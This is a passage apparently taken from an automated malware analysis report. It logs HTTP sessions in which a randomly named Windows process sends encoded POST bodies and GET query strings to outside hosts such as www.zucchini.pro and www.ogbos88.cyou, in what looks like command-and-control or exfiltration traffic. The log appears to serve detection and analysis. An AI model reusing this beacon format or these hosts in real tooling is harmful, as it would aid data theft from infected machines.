4a 57 56 45 58 35 44 47 50 6a 6f 67 4f 50 2f 68 47 7a 6c 4d 49 46 6b Data Ascii: O2ePNNH0=7rQ6heHB84TcyDGvliXxoLgHJafLWsIXxpJtkeh/kjJG7LUgFft9ABC6IuVi/OdFPtN26yuz1la3dMf0Rzi3tWowjGQUddEvHMzJ/h5+Hxg9BcPPVqT30nt0XpHSI9RpN1yZp3WIYIjPfkUhVhN/uJVE5JAZh75X/5OpQs8HgVd60m0+QR1tUPoQuNTdUWjbcMOPQJWVEX5DGPjogOP/hGzlMIFk
Jan 6, 2025 16:02:57.007728100 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:02:56 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 682f0b5c-b427-48fb-a8ba-08dd55798195 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zk8DUzYUWOw7OQvCJiw5c3g78z6vccvEwmb/zbzLGC335K62r7Ecud46YaXHGmDZK7pxoulRq0ngHFZNx9hzug== set-cookie: parking_session=682f0b5c-b427-48fb-a8ba-08dd55798195; expires=Mon, 06 Jan 2025 15:17:56 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 6b 38 44 55 7a 59 55 57 4f 77 37 4f 51 76 43 4a 69 77 35 63 33 67 37 38 7a 36 76 63 63 76 45 77 6d 62 2f 7a 62 7a 4c 47 43 33 33 35 4b 36 32 72 37 45 63 75 64 34 36 59 61 58 48 47 6d 44 5a 4b 37 70 78 6f 75 6c 52 71 30 6e 67 48 46 5a 4e 78 39 68 7a 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zk8DUzYUWOw7OQvCJiw5c3g78z6vccvEwmb/zbzLGC335K62r7Ecud46YaXHGmDZK7pxoulRq0ngHFZNx9hzug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:02:57.007740974 CET	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjgyZjBiNWMtYjQyNy00OGZiLWE4YmEtMDhkZDU1Nzk4MTk1IiwicGFnZV90aW1lIjoxNzM2MTc1Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	60144	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:02:59.100295067 CET	1773	OUT	POST /ajra/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.zucchini.pro Origin: http://www.zucchini.pro Referer: http://www.zucchini.pro/ajra/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 37 72 51 36 68 65 48 42 38 34 54 63 79 44 47 76 6c 69 58 78 6f 4c 67 48 4a 61 66 4c 57 73 49 58 78 70 4a 74 6b 65 68 2f 6b 6a 78 47 37 39 6f 67 45 2b 74 39 53 78 43 36 57 65 56 2f 2f 4f 63 56 50 73 6c 36 36 79 7a 4f 31 6a 57 33 63 76 6e 30 59 6e 2b 33 6e 57 6f 77 73 6d 51 4a 5a 64 46 6e 48 4d 6a 4e 2f 68 4a 2b 48 78 67 39 42 64 2f 50 54 2f 2f 33 34 48 74 33 51 70 48 4f 4d 39 51 6e 4e 31 4c 73 70 33 54 33 45 70 44 50 66 45 45 68 57 54 6c 2f 73 70 56 47 36 4a 41 37 68 38 77 4a 2f 39 6e 59 51 73 4a 53 67 57 4e 36 6b 52 46 56 4e 69 39 58 42 5a 45 55 6d 36 37 4d 63 52 44 49 62 4f 2b 31 56 70 44 78 46 67 55 6f 41 2f 2f 62 6a 35 75 71 36 58 50 4a 42 4e 45 31 2f 47 70 63 30 62 33 77 4c 48 71 64 64 36 6d 44 49 45 5a 62 42 78 6d 32 31 72 6f 44 45 54 55 30 49 46 5a 5a 56 43 51 73 66 39 69 45 75 34 79 39 59 6d 43 78 79 55 4d 4e 63 71 63 43 69 66 5a 45 6d 44 4b 31 73 70 67 58 34 30 63 46 6c 38 49 6f 72 30 74 46 33 61 51 50 38 79 59 30 58 66 61 4b 49 75 65 52 6b 53 61 45 35 39 4e 2b 71 [TRUNCATED] Data Ascii: O2ePNNH0=7rQ6heHB84TcyDGvliXxoLgHJafLWsIXxpJtkeh/kjxG79ogE+t9SxC6WeV//OcVPsl66yzO1jW3cvn0Yn+3nWowsmQJZdFnHMjN/hJ+Hxg9Bd/PT//34Ht3QpHOM9QnN1Lsp3T3EpDPfEEhWTl/spVG6JA7h8wJ/9nYQsJSgWN6kRFVNi9XBZEUm67McRDIbO+1VpDxFgUoA//bj5uq6XPJBNE1/Gpc0b3wLHqdd6mDIEZbBxm21roDETU0IFZZVCQsf9iEu4y9YmCxyUMNcqcCifZEmDK1spgX40cFl8Ior0tF3aQP8yY0XfaKIueRkSaE59N+qcmuf26OAjqDPuGWWk5PdV4+ro74AMjGQffUG+5XOtuFieVWaQZpOTEE/kt57vkCQQRRhl+UQ/f3ao6pOTml6O22Whi2kTLTXFbIhL4/vUTrQ80GtSLq3L+pS97NJ7hnBlU0P+/x5ZQ77SvhciPvwlpBSXgKpkok2oUc/XDe01d4xh1QD45BQIElOtNTVkJJ7rEgJcWmlRdWxxA1tSw4OcogR67LBpGXwWjbhujqNDzmTPV8hSZq1YjwEYA2nDDMfgH1FqrqgDwCO5HV1JfU4W4kO4xCdlGLxeaJ4h69gk1CdY2HaPvaDLuEYGy/T1P3JEMv5muSeCN/p/rA8dxUVukJ1Dw2lL/762KaaemIHv2URmv+e5CJkSnheq+Oy4mw6Y1Yx9dMPpa5nPDoQXYREkb41zpidk/KhxWsF+VMvTuNZ+DpZZunXYs+BnO5B0g8YwTioVUqeRvZfq8CLzFGhPwGBFJmNtUalsIw1a5QOJD64YlTe0S6eEzingW/xb6Sj1C+si06jZxRQZK/vBIIx2n/JEfvgX0XdBCZzU2saz3YiAjTgSuruZokveSX8wSOxwFCjISPwpipRWHKYOduQWFvDv7o5fNIi1IudKeMXCFZTKBmfUSfNUjnaqybw6axxRda5RV7qoYkXIKa6IWAKv8xFNfxSerd9TI [TRUNCATED]
Jan 6, 2025 16:02:59.576628923 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:02:59 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 0ff76875-9d3e-4ff6-abfe-39acae048269 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zk8DUzYUWOw7OQvCJiw5c3g78z6vccvEwmb/zbzLGC335K62r7Ecud46YaXHGmDZK7pxoulRq0ngHFZNx9hzug== set-cookie: parking_session=0ff76875-9d3e-4ff6-abfe-39acae048269; expires=Mon, 06 Jan 2025 15:17:59 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 6b 38 44 55 7a 59 55 57 4f 77 37 4f 51 76 43 4a 69 77 35 63 33 67 37 38 7a 36 76 63 63 76 45 77 6d 62 2f 7a 62 7a 4c 47 43 33 33 35 4b 36 32 72 37 45 63 75 64 34 36 59 61 58 48 47 6d 44 5a 4b 37 70 78 6f 75 6c 52 71 30 6e 67 48 46 5a 4e 78 39 68 7a 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zk8DUzYUWOw7OQvCJiw5c3g78z6vccvEwmb/zbzLGC335K62r7Ecud46YaXHGmDZK7pxoulRq0ngHFZNx9hzug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:02:59.576642036 CET	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGZmNzY4NzUtOWQzZS00ZmY2LWFiZmUtMzlhY2FlMDQ4MjY5IiwicGFnZV90aW1lIjoxNzM2MTc1Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	60145	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:01.640290022 CET	479	OUT	GET /ajra/?O2ePNNH0=2p4airO795Dn7gjP+jvTybwKdYuaf9hxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt1dK3H8aNuBfPvyb8EJGClNEbPXCYZb+xDZ5J+2PL+Z5SA==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.zucchini.pro Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:03:02.082026958 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:03:01 GMT content-type: text/html; charset=utf-8 content-length: 1502 x-request-id: d764f4bf-5054-4dcf-a7eb-e85ee610821f cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kMUvEo5fsSfNp7n+OtPvmIMdJNquEHRZI8E5cQ7zeCXq1eT9JKd4GPcB7pPosIeXc189HwcsRciAZOLFqPh99w== set-cookie: parking_session=d764f4bf-5054-4dcf-a7eb-e85ee610821f; expires=Mon, 06 Jan 2025 15:18:02 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 4d 55 76 45 6f 35 66 73 53 66 4e 70 37 6e 2b 4f 74 50 76 6d 49 4d 64 4a 4e 71 75 45 48 52 5a 49 38 45 35 63 51 37 7a 65 43 58 71 31 65 54 39 4a 4b 64 34 47 50 63 42 37 70 50 6f 73 49 65 58 63 31 38 39 48 77 63 73 52 63 69 41 5a 4f 4c 46 71 50 68 39 39 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kMUvEo5fsSfNp7n+OtPvmIMdJNquEHRZI8E5cQ7zeCXq1eT9JKd4GPcB7pPosIeXc189HwcsRciAZOLFqPh99w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:03:02.082050085 CET	955	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDc2NGY0YmYtNTA1NC00ZGNmLWE3ZWItZTg1ZWU2MTA4MjFmIiwicGFnZV90aW1lIjoxNzM2MTc1Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	60147	104.21.13.141	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:15.311470985 CET	736	OUT	POST /q1v9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/q1v9/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 72 63 46 52 30 53 63 72 71 50 68 2f 77 54 38 73 65 49 7a 49 58 39 32 61 6d 6d 45 31 54 4d 43 79 4b 6d 31 6c 33 4c 46 6e 5a 68 33 62 59 4e 58 2f 6a 69 56 32 62 4b 6f 70 73 54 79 70 71 38 43 58 65 65 48 36 5a 6e 43 41 44 4c 35 44 48 75 58 77 71 77 4f 38 33 32 4c 70 79 67 59 4f 6f 49 32 6f 41 57 50 6a 4e 41 55 6f 63 50 55 61 6c 50 38 36 6a 58 69 79 6d 37 32 77 7a 30 72 74 75 6d 48 5a 65 47 47 6a 55 79 56 6c 6f 58 39 64 55 48 69 4c 7a 41 6b 5a 59 6b 56 33 32 55 52 41 43 41 77 72 72 49 36 50 55 6a 79 78 6b 64 4e 4f 61 50 64 2f 31 4d 5a 61 49 44 39 51 31 4b 6d 49 6b 48 51 34 2b 71 69 68 56 51 51 3d Data Ascii: O2ePNNH0=rcFR0ScrqPh/wT8seIzIX92ammE1TMCyKm1l3LFnZh3bYNX/jiV2bKopsTypq8CXeeH6ZnCADL5DHuXwqwO832LpygYOoI2oAWPjNAUocPUalP86jXiym72wz0rtumHZeGGjUyVloX9dUHiLzAkZYkV32URACAwrrI6PUjyxkdNOaPd/1MZaID9Q1KmIkHQ4+qihVQQ=
Jan 6, 2025 16:03:15.780582905 CET	800	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 Jan 2025 15:03:15 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 06 Jan 2025 16:03:15 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gOb4Use36rFyFXo2Is%2FQh6tlJ58p8xDK0RIvT2rYeJHTn7GtDb9MGSSrHaZy4R82xubNmfxXsoUjGZQRamC12CynAkmWb8KAEGsQfYdzry0dL5oZanQoANZAf8jhm3RIjfuB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8fdc9803284b41b5-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	60148	104.21.13.141	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:17.865447044 CET	756	OUT	POST /q1v9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/q1v9/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 72 63 46 52 30 53 63 72 71 50 68 2f 79 33 34 73 62 72 72 49 44 74 32 5a 70 47 45 31 64 73 43 32 4b 6d 70 6c 33 4f 39 33 5a 33 66 62 59 73 48 2f 6b 6a 56 32 59 4b 6f 70 6d 7a 79 77 6b 63 44 62 65 65 4b 51 5a 6e 2b 41 44 4c 74 44 48 76 6e 77 32 54 6d 2f 32 6d 4c 33 30 67 59 41 6c 6f 32 6f 41 57 50 6a 4e 41 41 52 63 50 63 61 6b 2f 4d 36 68 32 69 39 72 62 32 2f 6a 45 72 74 71 6d 47 51 65 47 48 32 55 77 68 50 6f 52 68 64 55 48 53 4c 79 55 77 59 42 55 56 35 70 6b 51 50 4c 6c 52 52 79 37 6d 4a 53 46 61 6b 6a 39 45 32 57 5a 73 56 76 75 52 63 4c 44 56 37 31 4a 4f 2b 68 77 4e 51 6b 4a 79 52 4c 48 45 38 69 52 52 4e 67 78 74 73 48 79 37 67 5a 7a 33 49 56 65 4b 7a Data Ascii: O2ePNNH0=rcFR0ScrqPh/y34sbrrIDt2ZpGE1dsC2Kmpl3O93Z3fbYsH/kjV2YKopmzywkcDbeeKQZn+ADLtDHvnw2Tm/2mL30gYAlo2oAWPjNAARcPcak/M6h2i9rb2/jErtqmGQeGH2UwhPoRhdUHSLyUwYBUV5pkQPLlRRy7mJSFakj9E2WZsVvuRcLDV71JO+hwNQkJyRLHE8iRRNgxtsHy7gZz3IVeKz
Jan 6, 2025 16:03:18.384545088 CET	804	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 Jan 2025 15:03:18 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 06 Jan 2025 16:03:18 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DvnJ8DSfYySohNl%2FZhaet8M8irT1LG2vqk1ySLXKZtSnPp%2FrElju2GCWA29YGoqKDQErzM5eEDzpy34oBX0CoO8%2BdOKYNfwpaMIl3M7Z2j8OVHbVJ5UvtULp6nkpsyYCYwGz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8fdc9813385d4387-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	60149	104.21.13.141	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:20.411663055 CET	1773	OUT	POST /q1v9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/q1v9/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 72 63 46 52 30 53 63 72 71 50 68 2f 79 33 34 73 62 72 72 49 44 74 32 5a 70 47 45 31 64 73 43 32 4b 6d 70 6c 33 4f 39 33 5a 33 6e 62 66 65 66 2f 69 41 4e 32 5a 4b 6f 70 71 54 79 74 6b 63 43 42 65 64 36 55 5a 6e 7a 31 44 49 56 44 47 4e 76 77 6d 6d 53 2f 2f 6d 4c 33 32 67 59 42 6f 49 32 39 41 53 6a 6e 4e 41 51 52 63 50 63 61 6b 38 55 36 76 33 69 39 70 62 32 77 7a 30 72 70 75 6d 47 38 65 46 32 4e 55 7a 4d 34 72 69 35 64 55 6e 43 4c 77 6e 59 59 4a 55 55 66 71 6b 52 51 4c 6c 56 30 79 37 36 6a 53 42 53 4f 6a 2b 6b 32 56 75 56 55 77 64 56 59 5a 69 42 52 7a 35 72 66 6c 44 35 61 6c 36 43 36 58 45 77 2f 6c 6b 4e 42 71 77 74 55 53 69 75 50 43 48 33 38 62 6f 69 7a 74 44 7a 71 66 6b 41 4f 38 56 77 54 37 64 75 39 49 74 58 55 36 76 59 68 74 45 50 4c 4e 54 75 73 6c 69 49 62 75 78 35 6c 68 6e 7a 55 71 2b 34 53 6c 79 6b 50 6c 78 31 66 32 61 45 36 48 4f 57 34 36 37 63 58 51 43 39 37 54 78 2b 72 61 42 6a 4f 43 62 68 55 76 38 76 6a 33 45 6f 70 64 74 44 2b 6d 74 50 35 33 70 6e 56 58 46 76 34 61 [TRUNCATED] Data Ascii: 